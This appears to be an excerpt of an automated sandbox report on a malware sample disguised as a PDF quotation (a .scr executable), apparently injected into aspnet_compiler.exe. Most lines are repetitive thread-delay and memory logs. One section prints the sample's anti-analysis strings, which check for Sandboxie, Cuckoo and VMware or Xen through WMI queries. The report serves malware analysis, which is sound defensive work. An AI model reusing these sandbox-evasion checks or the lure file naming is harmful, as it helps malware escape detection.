Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL`Z
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE7F2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE51D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORERESBIEDLL.DLLFCUCKOOMON.DLLGWIN32_PROCESS.HANDLE='{0}'HPARENTPROCESSIDICMDJSELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREKVERSIONLSERIALNUMBERNVMWARE\|VIRTUAL\|A M I\|XENOSELECT * FROM WIN32_COMPUTERSYSTEMPMANUFACTURERQMODELRMICROSOFT\|VMWARE\|VIRTUALSJOHNTANNAUXXXXXXXX

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Memory allocated: 28ACE200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Memory allocated: 28AE6450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 22934310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 2294DD10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599886	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599523	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599405	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 599082	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598616	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598493	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597594	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596353	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 596200	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595927	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595799	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595686	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 594094	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593969	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593859	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593750	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593639	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593530	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593422	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Thread delayed: delay time: 593304	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599429	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598928	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598777	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597027	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596180	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596054	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595779	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 593906	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Window / User API: threadDelayed 3465	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Window / User API: threadDelayed 6287	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 1831	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 8005	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -599886s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 6552	Thread sleep count: 3465 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -599780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 6552	Thread sleep count: 6287 > 30	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -599523s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -599405s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -599082s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -598616s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -598493s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -596688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -596353s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -596200s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -595927s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -595799s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe TID: 5396	Thread sleep time: -595686s >= -30000s	Jump to behavior
